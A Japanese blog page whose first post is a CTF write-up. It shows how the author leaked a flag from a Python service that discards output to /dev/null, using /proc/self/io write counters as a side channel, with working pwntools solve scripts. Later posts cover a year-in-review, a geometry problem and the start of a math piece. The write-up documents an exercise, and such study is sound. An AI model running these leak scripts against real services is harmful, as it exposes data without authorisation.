タイトルの命名規則をどうするか悩んでいます。

Daily AlpacaHack B-SIDE 2026/2/9–2026/2/12 の write-up です。

Daily AlpacaHack B-SIDE
新しい問題はVery Very Hard級で、まだ1 solveです
挑戦お待ちしています！https://t.co/09RvUeY6Yr pic.twitter.com/tHqf7SpQJY

— minaminao (@2llr) 2026年2月8日

むずかし〜〜。「A-SIDE の Hard を解いて調子に乗っていたえびちゃんを怖がらせましょう」か？みたいな気持ちで一日過ごしました。

B-SIDE はロゴがオサレでとても好きです。

• やったことたち
  • ① timing attacks
  • ② /proc/self/mem
  • ③ /dev/**
  • ④ /proc/self/maps, [heap]
  • ⑤ /proc/self/io (1)
  • ⑥ /proc/self/io (2)
  • ⑦ SOLVED!
• 所感
• その他
• おわり

やったことたち

① timing attacks

まず、“avoid timing attacks” と書いてありますが if "Alpaca" in line else None のところで処理に差自体はあるため、どうにかなる可能性はありうるか？と思いました。 ですがそもそも通信環境側の影響の方が大きく、とても現実的ではなさそうでした。 たぶん、たぶんですが、この方針で非常にがんばることで timing attacks を成功させるという想定で Very Very Hard を謳う思想の企画ではなさそうだよなと思ってこの方針は違うだろうなと思いました。

"flag.txt" "" を入力して下記の行が消えているのを見て、「たしかにそうなるか〜」と思ったりしましたが、あまりこれを使えそうな気はしませんでした。

            print(line, file=FLAG_EATER if "Alpaca" in line else None)

② /proc/self/mem

さて、flag.txt を読みつつ "Alpaca" in line を False にできたらうれしいなという気持ちになり、次のような方針を考えました。

• 何らかの方法で flag.txt を上書きして、*lpaca{...} のような文字列に変える
• 何らかの方法で flag.txt を途中から読み、lpaca{...} のような文字列を読むようにする

どちらも flag.txt を読むだけだとつらそうで、可能性があるとすれば、一度 flag.txt を読んだ後にメモリのどこかしらをどうにか読み書きするような策を考えるとかになるかなと思いました。

memo: この時点で、FLAG_EATER と DUMMY_EATER のどちらの fd を通して /dev/null に書き込んだか追えればうれしそうだよなという気持ちはありましたが、大変そうな気がしたので一旦後回しにしました。

CPython の実装はわかりませんが、fopen のような機構を使っているのであれば heap 領域にファイル読み書き用のバッファを設けていた記憶があるので、"/proc/self/maps" "[heap]" を指定してアドレスを見たりしました。ASLR の bypass はできるね〜という気持ちになりましたが、「で？笑」となりました。

/proc/self/mem を読もうとしましたが OSError: [Errno 5] Input/output error が出たので微妙そうです。seek 的な操作もできなさそうなので、あまり深追いしてもだめそうな気がしました。 適当に /dev/random とかを読もうとしてみると UnicodeDecodeError: 'utf-8' codec can't decode byte 0x9f in position 3: invalid start byte が出たので、メモリ上を適当に読めたとして UTF-8 として有効なバイト列ではないとだめという制約もあり、（読めたとしても）詰めるのが大変そうな気がしました。

③ /dev/**

flag.txt を直接読んでも意味がないですし、/usr/share/dict/words（などの普通のテキストファイル）も無意味そうで、読んでどうにかなりそうなファイルといったら /dev/** か /proc/** の 2 択だろうということで、一旦 /dev の方から試そうと思いました。

    content = open(file or EXAMPLE_FILE).read(0x10000)

この部分で open() したものを close() していない（with 構文も使っていない）ので、/dev/fd/5 とかを読むことでどうにかなるかな？と思いました。 しかし、"flag.txt" "" を入れてから "/dev/fd/5" "" などを入れてみても FileNotFoundError: [Errno 2] No such file or directory: '/dev/fd/5' と出ます。 /dev/fd/{3,4} を読むと無が返ってきましたが、/dev/fd/{0..2} を読もうとすると OSError: [Errno 6] No such device or address: '/dev/fd/0' のようなエラーが返ってきました。

このへんは socat の都合？ あまりわかっていませんが、socat 側を読もうとしたらなにか発見があるかなと思って /proc/1/fd/0 や /proc/1/maps などを見ましたが、あまり実りはありませんでした。

FLAG_EATER と DUMMY_EATER がそれぞれ /dev/fd/3 と /dev/fd/4 に相当すると思うので、open() したら /dev/fd/5 ができていてほしい気持ちになり、実験しました。

nobody@ec54248b6ec3:/app$ python3 -c 'import os; open("/etc/bash.bashrc"); print(os.listdir("/dev/fd"))'
#> ['0', '1', '2', '3']

nobody@ec54248b6ec3:/app$ python3 -c 'import os; _ = open("/etc/bash.bashrc"); print(os.listdir("/dev/fd"))'
#> ['0', '1', '2', '3', '4']

どうやら、そのまま読み捨てると /dev/fd 配下には残らないようです？

nobody@ec54248b6ec3:/app$ python3 -c 'import os; _1 = open("/etc/bash.bashrc"); _2 = open("/etc/bash.bashrc"); print(os.listdir("/dev/fd"))'
#> ['0', '1', '2', '3', '4', '5']

nobody@ec54248b6ec3:/app$ python3 -c 'import os; _ = open("/etc/bash.bashrc"); _ = open("/etc/bash.bashrc"); print(os.listdir("/dev/fd"))'
#> ['0', '1', '2', '3', '4']

nobody@ec54248b6ec3:/app$ python3 -c 'import os; _ = open("/etc/bash.bashrc"); _ = open("/etc/profile"); print(os.listdir("/dev/fd"))'
#> ['0', '1', '2', '3', '4']

同じファイルでも別の変数に入れれば fd は増えるとか、変数を上書きした場合は fd は消えるとか、そういうことを試しました。

nobody@ec54248b6ec3:/app$ python3 -c 'import os; _1 = open("/etc/bash.bashrc"); _2 = open("/etc/bash.bashrc"); print(_1.fileno(), _2.fileno(), os.listdir("/dev/fd"))'
#> 3 4 ['0', '1', '2', '3', '4', '5']

os.listdir() を使った場合も、そのディレクトリに相当する部分で fd が使われている？ぽい？

などを試しましたが、結局のところ grep.py において fd が増えないことがわかり、困ったな〜となりました。

実験の過程で、 grep.py を次のように変更していました。

@@ -1,8 +1,13 @@
+import os
+
 EXAMPLE_FILE = "/usr/share/dict/words"
 FLAG_EATER = open("/dev/null", "w")
 DUMMY_EATER = open("/dev/null", "w")
 
 while True:
+    print(os.listdir("/proc/self/task"))
+    print(os.listdir("/proc/self/fdinfo"))
+
     file = input(f"File (Default: {EXAMPLE_FILE}, Flag: flag.txt): ")
     pattern = input("Pattern: ")
     content = open(file or EXAMPLE_FILE).read(0x10000)

④ /proc/self/maps, [heap]

（いや〜〜わからんという気持ちは常にあり、適当な timing attacks の誘惑に何度か駆られましたが、割愛します。）

結局、FLAG_EATER を通して write をした場合と DUMMY_EATER を通して write をした場合とで何らかの差異を見つけるくらいしかないでしょうということになってきます。

• /proc/self/fdinfo/{fd} 的な機構で、それに対して最後に write した日時が書いてある場所が存在することを祈る
• 書き込みで何らかの方法でバッファリングされている前提で、heap 領域の拡張などが発生することを祈る

みたいなことが思い浮かびますが、前者に関しては調べた感じだと存在しなさそうでした。

ということで、後者に関してローカルでがちゃがちゃします。

from pwn import *


def nc(nc_comm):
    nc_argv0, host, port = nc_comm.split()
    return remote(host, int(port))


p = nc("nc localhost 1337")


PROMPT_1 = b"File (Default: /usr/share/dict/words, Flag: flag.txt): "
PROMPT_2 = b"Pattern: "


def get_maps():
    res = ""
    p.sendlineafter(PROMPT_1, b"/proc/self/maps")
    p.sendlineafter(PROMPT_2, b"")
    while True:
        line = p.recvline().decode()
        res += line
        if "[vdso]" in line:
            break

    return res

p.sendlineafter(PROMPT_1, b"")
p.sendlineafter(PROMPT_2, b"")

s = ["Al"] * 10000  # 200
# s = ["Al"] * 100 + ["X"] * 10000  # 300

maps = ""
for i in range(10000):
    print(f"{i}\r", end="")
    p.sendlineafter(PROMPT_1, b"flag.txt")
    p.sendlineafter(PROMPT_2, s[i].encode())

    tmp = get_maps()
    if maps != tmp:
        print(f"=== {i} ======")
        print(tmp)
        maps = tmp
        if i > 0:
            break

どうやら、全部の出力が FLAG_EATER に行ったときと、両方の eater に行ったときで heap の広がり方に違いがありました（！）。 具体的には、どちらかの eater が 201 回目の出力をしたときに heap が広がっていそうで、FLAG_EATER に出力し続けると 201 回目に heap が広がりました。 一方、FLAG_EATER に 100 回出力してから DUMMY_EATER に出力し続けると（全体としては）301 回目に heap が広がりました。 差異が出たときには「wow〜〜」という気持ちでした。

ということでこの方針で exploit を書いたのですが、本番サーバに対してはうまくいきません。 さっきの実験で grep.py を変えたときの差分が本質か？ということで戻してみたところ、ローカルでもうまくいかなさが再現したので、「お前〜〜」となり revert しました。

とはいえ、概ね方針としてはこういう感じでいけるだろうという確信ができてきました。

memo: /usr/share/dict/words を読むと heap size が 0x30000 大きくなったり、2 回連続で読むと計 0x60000 大きくなったり、その後 flag.txt を読むと元に戻ったりすることなども観測しましたが、あまり実りはなさそうに感じました。

⑤ /proc/self/io (1)

ここからはもうめちゃくちゃで、/proc/self/* を全部試します。

/proc/self/environ を見てニヤニヤしたり（実りがない）、/proc/self/stat の utime の項目から timing attacks ができないか（結局それ？）とか、そんなことをしていました。 そんな中で一際輝いていたのが /proc/self/io です。

File (Default: /usr/share/dict/words, Flag: flag.txt): /proc/self/io
Pattern: 
rchar: 33802
wchar: 64
syscr: 30
syscw: 2
read_bytes: 0
write_bytes: 0
cancelled_write_bytes: 0

File (Default: /usr/share/dict/words, Flag: flag.txt): /proc/self/io
Pattern: 
rchar: 33913
wchar: 224
syscr: 34
syscw: 4
read_bytes: 0
write_bytes: 0
cancelled_write_bytes: 0

どうやら読み書きに応じて値が変わってくれるようです。各項の説明は proc_pid_io(5) に書いてあります。 ということで、次のように入力をして rchar の値を比較することで flag.txt のサイズを得ることができます。

• "/proc/self/io" "" → "flag.txt" "" × 1 → "/proc/self/io" ""
• "/proc/self/io" "" → "flag.txt" "" × 2 → "/proc/self/io" ""

前者は 33802 → 33941、後者は 33802 → 33969 でした。33969-33941 = 28 であることと、b"flag.txt\n" b"\n" で 10 bytes 読んでいること、flag.txt の末尾には改行文字が含まれているであろうこと（少なくとも配布ファイル的にはそう）から、結局 flag format は Alpaca\{[a-z_]{9}\} であろうと突き止められます。

この時点で頭がおかしくなっていたので、9 文字の単語を考えて Alpaca{minaminao} Alpaca{invisible} などを適当に提出しましたが当然不正解でした。そもそもこれが正解だったら flag format が Alpaca{[a-z_]+} ではなく Alpaca{[a-z]+} だろ〜という気持ちになりました。そこか？

あと 9 文字程度だったら timing attacks でどうにかなるんじゃないか？と思いました。なる気はしていません。

⑥ /proc/self/io (2)

気を取り直してがんばります。今度は wchar の方に着目します。

"/proc/self/io" "" → "flag.txt" "" × n → "/proc/self/io" "" のときの wchar の増分を表にします。

1 回あたり 64 ずつ増えるのかな？という見た目をしています。これは b"File (Default: /usr/share/dict/words, Flag: flag.txt): " b"Pattern: " のバイト数に等しいです。 ですが、n = 10000 の行が明らかにおかしいです（偶奇からすぐわかる）。 /dev/fd/3 を通しての /dev/null への書き込みがバッファリングされていて、1000 と 10000 の間のどこかで flush されているのだろうと推測できます。

ということで二分探索などをして、境界値を次のように絞り込みます。

よって、flag.txt の内容を 7296 回出力すると、wchar の値からその事実を読み取れそうです（たぶんこの辺はバッファサイズやバッファリングの実装方式の都合だと思いますが、詳細は調べていません）。

⑦ SOLVED!

ということで、祈りつつ仕上げです。

• ("flag.txt" "A") × 7295 + ("flag.txt" "B")
• ("flag.txt" "A") × 7296

これらを与えたときで、Δwchar に差異があれば勝ちです。 実際に試すと、前者は 467104 で、後者は 590223 となりました（前者は 467040 + 64 であることがわかりますね）。ということで、次のような方針でフラグを得られそうです。

1. abcdefghijklmnopqrstuvwxyz_{} の中から、フラグに含まれる文字を特定する
   • 別にここはやらなくてもいいが、探索空間を狭められるため
2. 1. で特定した文字集合を使い、"A" から始めて 1 文字ずつ特定する
   • "Alpaca{" から始めてもいいがなんとなく

from pwn import *


def nc(nc_comm):
    nc_argv0, host, port = nc_comm.split()
    return remote(host, int(port))


PROMPT_1 = b"File (Default: /usr/share/dict/words, Flag: flag.txt): "
PROMPT_2 = b"Pattern: "


def get_wchar(p):
    p.sendlineafter(PROMPT_1, b"/proc/self/io")
    p.sendlineafter(PROMPT_2, b"")
    p.recvuntil(b"wchar: ")
    return int(p.recvline())


def contains(s):
    p = nc(NC)
    w1 = get_wchar(p)
    payload = (f"flag.txt\n{s}\n" * 7295 + "flag.txt\n@\n").encode()
    p.send(payload)
    w2 = get_wchar(p)
    p.close()
    return (w2 - w1 - 224) % 64 == 0


flag_chars = "abcdefghijklmnopqrstuvwxyz_{}"

NC = "nc 34.170.146.252 32376"

tmp = ""
for c in flag_chars:
    if contains(c):
        tmp += c


flag_chars = tmp
print(f"{flag_chars = }")

flag = "A"
while True:
    for c in flag_chars:
        if contains(flag + c):
            flag += c
            print(f"+= {c}")
            break
    else:
        break

print(flag)

以上により、フラグ Alpaca{busy_blue} を得られました。えびちゃんは存じ上げないのですが、調べた感じはなにかの曲名ですか？ あるいは他に由来があるのかもしれません。おそらくは頭文字が B-SIDE とも掛かっているのかなという気がして、オサレさを感じていました。

所感

毎度ながら問題を作るのが上手だなあと思いました。

/dev/null に流すと「消える」みたいに言われがちですが、syscall を呼び出す側の者からするとその他のファイルと区別がつかない（はず？）ので、プログラム側では /dev/null 用に特殊なことをできるわけがないよなあとか、そういうことをちゃんと考えると解けるようになっていて面白いと思いました。もしかしたら別の解法もあるのかもしれません？ あるのかな。

C とかのレイヤーのものはしばしば調べたりしていたのですが、CPython の open(), print() などについても気になりました。あと、これは前からですが /proc や /dev についても調べたいなと思っています。

その他

batch sendというCTF典型(?)テクがあって、毎回recvせずに全部send→全部recvをすると1秒くらいになりますhttps://t.co/gQf1zjjJs1

— Yu (@Yu_212_MC) 2026年1月31日

You saved my day (and streak)!

でも早めに streak を切っておかないと後々苦しめられる日々が来ます。wafflegame を 1000 日くらい続けたえびちゃんが言います。 2025/12/5 の Integer Writer で沼っていきなり脱落していた世界線もたぶんあり得ました。

おわり

おわりです。

今年もやってみます

rsk0315.hatenablog.com

2025 年に居残りしているえびちゃんが書いています。書き終わったらまた年末年始休暇をやりたいですね。

• 今年書いたもの
  • 低レイヤ寄り
  • 浮動小数点型関連
  • 競プロ
  • ポエム
• 今年がんばったもの
  • 競プロ
  • CTF
  • ラテン語
• ツイート振り返り
• よかったもの
• 抱負
• よいおとしを

今年書いたもの

人々に読んでもらいたいものは ⭐、自分でも何度か読み返しているお気に入りのものは 💕 をつけています。 9–11 月は別のことをしていてあまり書いていないみたいでしたが、それより前は結構たくさん書いていたみたいでした。 浮動小数点型関連がたくさんありますね。

低レイヤ寄り

• /dev/clairvoyance について ⭐
  • /dev/random みたいな機構で非自明なものを作りたかった
• C の未定義動作とあそぼう ⭐
  • 1 / x の最適化、面白い
• 手元環境と AtCoder 環境で sin の出力が異なるのはな〜んでだ？ 💕
  • 低レイヤの知らないことを調べると面白い

浮動小数点型関連

• Python における int(a / b) と a // b について ⭐
  • $|a|\le 2^{53}$ であれば等しくなることを示した
• 浮動小数点型の仮数部の桁数を知りたいとき
  • おふざけ
• cbrt を求めよう (with glibc) ⭐
  • 数学関数の近似について調べた
• u64 の平方数判定を f64 の sqrt でやるやつの正当性 ⭐
  • ((n as f64).sqrt() as u64).pow(2) == n で平方数判定をして問題ないことを示した
• correct rounding への道 (1) 素朴な sqrt
• correct rounding への道 (2) shift-and-add algorithm
• correct rounding への道 (3) Newton’s method
  • $\sqrt x$ の correct rounding を求めた
• ABC 400 B の浮動小数点型解法の正当性の証明
  • 浮動小数点型を用いた解法の正当性を示して楽しんでいた
• 5.0 * x == x + x + x + x + x ⭐
  • これが成り立つことを示した。非自明すぎて面白くない？
• correct rounding への道 (4) error-free transformation
  • double-double に関しての補題を示した。triple-double を書こうとしたら終わる気がしなくなったので投げ出した
• 浮動小数点数のお手軽チェックリスト ⭐
  • 浮動小数点型初心者に読んでほしいかも
• correct rounding への道 (5) table-maker’s dilemma
  • 苦しいということがわかった
• AHC 048 の浮動小数点演算について
  • 気になったので書いた
• Complex FFT is (not) as bad as you think
  • 浮動小数点型を使いつつ工夫した FFT は高速かつ誤差も十分小さく評価できるのでは？と思ったが幻想だった
• int の列が等比数列かの判定を long double で行うのは正当か？ 💕
  • $x_1/y_1 = x_2/y_2$ の判定を浮動小数点型で行っていい条件について考えた
• + や - なしで int に 1 を足すには？
  • おあそび
• 浮動小数点型で素朴に二分探索をして大丈夫？ ⭐
  • 未証明で浮動小数点型を使うと危ないよね〜という例を書きたかったので書いた

競プロ

• ABC 405 E についての雑談
  • 離散モノについて考えたくなったので書いた
• modint に夢を見ている輩が多すぎる 💕
  • modint 初心者に見てほしいかも
• 区間和の最大値を求めるときのモノイドについて
  • ちゃんと書いたことがなかった気がするので改めて書いた
• NP-complete な問題となかよく ⭐
  • NP-complete な問題について敬遠し続けたくなかったので書いた
  • 帰着を考えるのは楽しかった
  • TikZ でおえかきして楽しかった
  • 最近の SAT solver ってすごいんだな
• 6259918212890625² mod 10¹⁶ みたいなやつ
  • Newton 法はえらい

ポエム

• 浮動小数点型に関するポエム 20250320
  • 書いた記憶があまりない
• イテレータとしての箱ティッシュとハンドソープ
  • ？笑
• AtCoder で伸び悩んでいる人々を見て思うところ (2025/12) ⭐
  • 前々から思っていたことを書きたくなってしまったので書いた

今年がんばったもの

競プロ

rsk0315.hatenablog.com

今年としてカウントしちゃいます*1。くるくるくるりんを AC しました。この点においては tourist にも勝っていると言っても過言ではない。でもやってって言ったら 30 分くらいで AC してくれそう（？）

他にも MHC の T シャツを入手したり、PAST で満点を取ったりしました。

CTF

AlpacaHack でいろいろ解きました。pwn では kvstore などの heap 問を解いたり、rev では fvm で x87 系の命令を勉強したり、pytecode で pickletools を勉強したりしました。

各ジャンルについて、kernel (pwn), heap (pwn), admin-bot (web), AES (crypto), LLL (crypto), Windows (rev) がまだまだなのでがんばりたいです。

Daily AlpacaHack は今のところ毎日こなせています。基本的に数分ペースで解けるので楽しいです。

ラテン語

ラテン語は、えびちゃんが大学生のときに講義があったのですが（定員とか時間枠とか必修科目との兼ね合いで）履修できず、卒業後に再燃していたものでした。

最近は Gauss の Disquisitiones Arithmeticae を読んでいます。合同式について書かれていて面白いです。 言い回しについても「こうやって言ったんだ〜」と思いながら読んだり、「こういう記号の使い方するんだ〜」と思いながら読んだりしています。 $a^2$ の代わりに $aa$ と書くのを好んでいたり、昔のフォントでは $\beta$ が 📞 みたいな形だったり、$+$ が横長だったり、$\lt$ が $\mathrm V$ を横に回転させたやつっぽかったり、そういう面白さもあります。

証明に関する言い回しとしては、“manifestum est” (it is obvious) とか “nullo negotio perspicitur” (it is perceived with no trouble) とか “facile possunt inveniri” (they can be found easily) などを見ました*2。 また、背理法の最後には Q.E.A. (quod erat absurdum) と書いていたり、Q.E.F. とか Q.E.P. とか Q.E.S. とかの用例も見つかりました。

このへんの話も別で記事を書くかもしれません。

ツイート振り返り

あ〜〜〜気持ちよかった pic.twitter.com/vQUXYSnQHf

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年2月2日

リステップとチュウニズムのコラボ、とてもよかった。常設譜面になってくれてうれしい。

お誕生日ぱふぇ https://t.co/7WERG6dIHx pic.twitter.com/8mTA2BDVmb

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年3月15日

お誕生日ぱふぇを食べました。 去年のお誕生日にはクレミアを食べました。来年はなにを食べようかしら。

お誕生日スィーツちゃんね pic.twitter.com/eroO7KvcNQ

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年4月2日

お誕生日スィーツ（別にお誕生日ではない）を食べました。

NandGame をしていました pic.twitter.com/TEX2nwplJW

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年5月2日

NandGame をやっていましたね。

ちゃーはん pic.twitter.com/jvSeYczcnp

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年5月5日

ふわ玉肉炒飯ちゃんでした。

double 型などとは違い、int 型は 0.1 + 0.2 == 0.3 が成り立つ素晴らしい型です pic.twitter.com/CfOa3DYxRw

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年5月17日

0.1 + 0.2 != 0.3 の話題が出てくるたびに思い出したい。

https://t.co/srhqGJhJZy
これね pic.twitter.com/u5shrGc1Sa

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年5月18日

12 周年おめでとう。

pic.twitter.com/7w6tZkTUZj

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年6月2日

🤔

おいしかったごはんフォロヮに見せてあげるね pic.twitter.com/ASqAtzatKi

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年8月12日

まぐろのレアかつ膳ちゃんでした。

ひあそびさん (@nannerlxxx) のインターネットやめろピンバッジを買っちゃった
フォロヮもいっしょにインターネットやめようね pic.twitter.com/1t0gmRHIq2

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年9月13日

インターネットをやめましょう。

できるできる pic.twitter.com/SZcA4JVZLg

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年10月1日

環ちゃんの新衣装ありがとうございます。

たのし〜〜〜
今回も気持ちよい譜面でした pic.twitter.com/CnXE5eqi4a

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年12月31日

めちゃむずかった気がするけど宣誓センセーションよりノーツ数は少ないらしいです。宣誓センセーションもめちゃむずかったはずなのに、今ではすっかり実家になってしまっています。 懐古厨なので宣誓センセーションの HARD で苦しんでいた時期を何度も思い出しています。

よかったもの

shop.rst-project.com

shop.rst-project.com

LoF -daybreak-/-twilight-、とてもよかったです。 遡行的インサイドが異彩を放ちすぎている。遡行的インサイド自身が出過ぎた杭すぎる。 12/31 発売で 12/25 お届け予定で 12/20 にお届けされるの、時空の歪みを感じます。

www.youtube.com

www.youtube.com

向こうの記事でも紹介した来栖りんさんです。

抱負

• くるくるくるりんのちゃんとした解説記事を書く
  • 需要のなさに惑わされない
• ゲテ問を解く
• ラテン語の読書をする
• CTF をする
• 他にやりたいことができたらそれをする
  • 当初やりたかったことができなくてもあんまり責めない
  • 圏論の誘惑は常にある

よいおとしを

これでえびちゃんも 2026 年に行けます。

くるくるくるりんという問題があります (AOJ / AtCoder)。 その昔は幾何のボス問*1として有名でしたが、最近の人々の間にはあまり知られていないのかもしれません。

• 背景
• 道のりと雑談
• ギャラリー
• 参考文献
• あとがき
• おわり

背景

2013 年の JAG 夏合宿 Day 3 の ++w と negainoido による問題セット で J 問題として出題された問題です。 有志合宿の解説スライドには writer・tester の名前とコード長を載せる慣習があった*2のですが、この問題の 解説スライド には下記の記述があります。

平原(276行, C++)
林(395行, C++) (途中で挫折)
生田(425行, C++) (途中で挫折)
大橋 (アメリカへ国外逃亡)

これがこの問題のやばそうっぽさを後押ししている気がします。

道のりと雑談

えびちゃんが大学生の頃に所属していた競プロサークルでは、卒業までにくるくるくるりんを解きましょうという圧がありました*3。 えびちゃんが調べたところでは、サークル内では Darsein さんと syl659 さんの 2 人しか解いておられないようでした（えびちゃんを除いて、そもそも全体でも 6 人しか AC していない）。

そういう刷り込みがあったので、「結局 例に漏れず 解く前に卒業しちゃったな」「いつかは解きたいな」と思い続けたまま過ごしていました。 解こうとして挫折するのを繰り返していましたが、2 ヶ月くらい前に解こうとまた思い立ち、まずは幾何の本^[1] を読みました。 元々は幾何の文脈というよりは、データ構造の文脈で読もうとして数年前に入手した本だった気がします。5 章に kd-trees, fractional cascading が、10 章に interval trees, priority search trees, segment trees が載っています。

幾何関連のデータ構造といえば、cs166.1216/11 などに載っているものたちも興味深いです。このシリーズの講義資料は、元々 van Emde Boas tree（当時の競プロ界隈では謎木と呼ばれていました）を調べていてたまたま見つけた cs166.1146/14 をきっかけに読むようになりました。 競プロ界隈ではあまりメジャーでないようなトピックについても触れられていて面白いです。英語ではありますが、わかりやすい図がついているので人々にもおすすめです。vEB 木といえば Erik Demaine 氏の講義 も観ました。このシリーズも面白いと思います。

競プロ界隈ではない計算幾何学のアルゴリズムは平衡木を当然のように使う印象があります。 C++ などの多くの言語の標準ライブラリで用意されているインタフェースでは足りない状況も多く、とりあえず自前で実装する必要があるため、ハードルが高くなっているような気がします。 幾何の定番高速化手法に平面走査と呼ばれるものがあり、それに添えられるデータ構造として（その問題ごとにアレンジした）平衡木が使われがちだと思います。

さて、本を読んだあとは AOJ の幾何の問題を埋めようとなりました。 AOJ の 問題検索 で Geometric Algorithms を上から解いていきました。 ねこまっしぐら も解きました。ねこまっしぐらは ICPC で幾何担当の人はみんな解いているような精進問だという印象があったのですが、別にそんなことはなさそうでした。しばしば話題に出ていたような記憶があったのですが、40 人も解いていませんでした。 Monster Trap は当時のチームメイト (TAB) が解いているのを見ていた記憶がありますが、これも 20 人程度しか解いていないようでした。実は幾何ってあまり解かれていない？

そんなこんなで順に解くのも飽きてきて、「もうくるくるくるりんやってよくない？」という気持ちになり、11 月末くらいにくるくるくるりんに取りかかり始めました。 デバッグの際にケースをおててで図示するのが嫌だったので、まず matplotlib でビジュアライザを書きました。 matplotlib のドキュメントは、“Switch to stable version” のボタンを何度押しても “This is documentation for an unstable development version.” と出てくるので不安な気持ちになります。

昔の初見のときはどこから手をつけたらいいものかわからず、他の人から「なんやかんやあって Dijkstra に帰着できる」という話は聞いていたものの、「なんで？」という感じでした。 前述の幾何の本の 15 章に可視グラフの話や回転なし版くるくるくるりんにあたる話が載っていたため、解説スライド p. 5 相当の話はわかるようになりました。 そのあたりがわかっていると、その後の方針は比較的スムーズに立つ気がします。各種判定などの細部についてはきちんと考える必要はあります。

12 月中の土日はあまり幾何の実装に集中できる感じではなかったので、年末年始に集中してやろうということで別のことをしていました。 CTF をしていたような気がします。結局ちゃんと始めたのは 12/29 だったと思います。 ビジュアライザを使いつつサンプルとにらめっこしながらうんうんやっていましたが、サンプルが通ったあとは比較的スムーズに AC までできました。

ギャラリー

ふと古きよきICPCの激ヤバ幾何の話になったのでAOJのくるくるくるりん見に行ったらいまだに6人しか解いてなくて草
いやまあ現代にあの問題をわざわざ解きにいく必要ないもんな (これは罠で、旧時代にもそんな理由はない)

— Dは堕天のD (@Darsein) 2025年12月24日

1 週間ちょい早く解いてたらこのツイートにカウントされることができたと思うと悔しい。

AC 初め！ pic.twitter.com/nhxxBGtzwM

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2026年1月2日

新年初 AC がこれ。縁起がよろしいです（？）

くるくるくるりんのアニメ https://t.co/ccV4nPHppv

— 平原秀一 (@_Tailed_) 2013年9月24日

writer ご本人様によるアニメーションを見つけました。テストケース名が maximum のケースに相当するものに見えます。 チーム一覧 を見つつ調べるに、writer 陣は tailed さん、flowlight さん、atetubou さん、Amylase さんなのかなと思います*4。

くるくるくるりん🎀✨ pic.twitter.com/B7mCXlobGs

— 音梨まりあ🪡🐈‍⬛🐾 (@maria_automata) 2021年11月13日

この文脈ではないくるくるくるりん🎀✨のまりあ様🪡🐈‍⬛🐾です。

参考文献

• [1]: Mark de Berg, Otfried Cheong, Marc van Kreveld, and Mark Overmars. Computational Geometry: Algorithms and Applications. Springer Berlin, Heidelberg, 2008.
  • https://doi.org/10.1007/978-3-540-77974-2

あとがき

「やらない善よりやる偽善」という言葉もありますが、やるだけを実際にやるのは大変なことだなあという気持ちになりました。

や、くるくるくるりんをやるだけと呼ぶかは議論の余地があると思います。「やるだけ」というのは「やることが明らかで、すぐ済む程度のもの」であって、「やることは明らかだが、何らかの面倒さがある」は含まないような気がします。この手のやつを指すときは「がんばる」とか「苦行」とかの方が近いかも？ 考察パートが重くないという部分は共通している気がします。 でも syl659 さんは「くるくるくるりんはやるだけ」と言っていた気がするし、やっぱりやるだけなのかもしれません。大抵の構文解析はやるだけという言説もありますし、多少の面倒さがあってもやるだけに含まれるかも。

苦行ではあるなぁという気持ちはあるものの、人間向きではないみたいな風潮はちょっと過剰なんじゃないか〜？という気持ちになりました。 みんなに解くのを勧めようとも思わないですが、わざわざ避けようとするのも違うんじゃないかというところです*5。 「定数時間 select の簡潔データ構造くらい実装しようとしてみてもいーんじゃない？」とか言っているのと似ていますね。 とはいえ、「ICPC 参加資格がある学生の間」といったような時期は優先順位も大事になってきますから、各々がやりたいものをやるのがいいと思います。

たしかねこまっしぐらを解こうとしていたときの話ですが、可視グラフ (visibility graph) についてググろうとしたとき、グラフ (chart) を用いてデータを可視化しようとしているページがたくさん出てきて嫌な気持ちになりました。あとがきを書きながら再度ググったら比較的マシな感じになっていてうれしいなとなりました。

そういえば、あとがきを書きながら気づいたのですが、来くる栖すりんさんは少し名前が似ておられます。かわいいねこ耳お姉さんです。

この投稿をInstagramで見る

元ネタのゲームの 説明書 や 紹介ページ や 実況プレイ動画 などを初めて見ました。 線分と見なしていたヘリリンにもちゃんとグラフィックがあるんだなぁとなりました。 もしかして元ネタでは常に回転していますか？

ここ数年は、やらなきゃと思ってやらずにいたことを回収するのをメインでやって（いるという気持ちで過ごして）いて、これもそのひとつですね。 こちらを優先したかったので、例年やっていたその年の振り返り記事を 2025 年は書きそびれてしまいました。 やりたいことはまだまだあるはずですが、少し燃え尽き気味のえびちゃんになるかもしれません。そうなっても自分を責めないであげたいですね。

やらなきゃと思っていることの中には「インターネットで有名なシーンがある漫画を読む」なども含まれていて、何ヶ月か前にデスノートを読みました。ジョジョとかも読みたいなと思っています。 TL を眺めていると「號奪戦の間合いですよ」とか言っているツイートがふと目に入って「また嘘喰い読むか〜」となってしまいます。 誘惑に負けないことが重要だったり、適宜負けてみることが重要だったりする気がします。

rsk0315.hatenablog.com

2024 年の振り返り記事を読み返してみて懐かしい気持ちになったので、遅ればせながら 2025 版もやっぱり書こうかなと思いました。 「昨日が 2025 年で今日が 2026 年だったから明日は 2027 年」ではないですが、この時期に 2024/12/28 と見るとどのくらい前のことか一瞬わからなくなりますね。 2026 年の抱負もいっしょに書こうかなぁと思います。

おわり

起き正月になってしまう。早めに寝ます。

下記が成り立ちます。 $$ \begin{aligned} &\phantom{{}={}} 6259918212890625^2 \\ &= 39186576032079756259918212890625 \\ &\equiv 6259918212890625 \pmod{10^{16}}. \end{aligned} $$ 今日はこういう感じのやつを求めていきます。

• 方法①
• 方法②
• おまけ
• 経緯
• 参考文献
• あとがき
• おわり

方法①

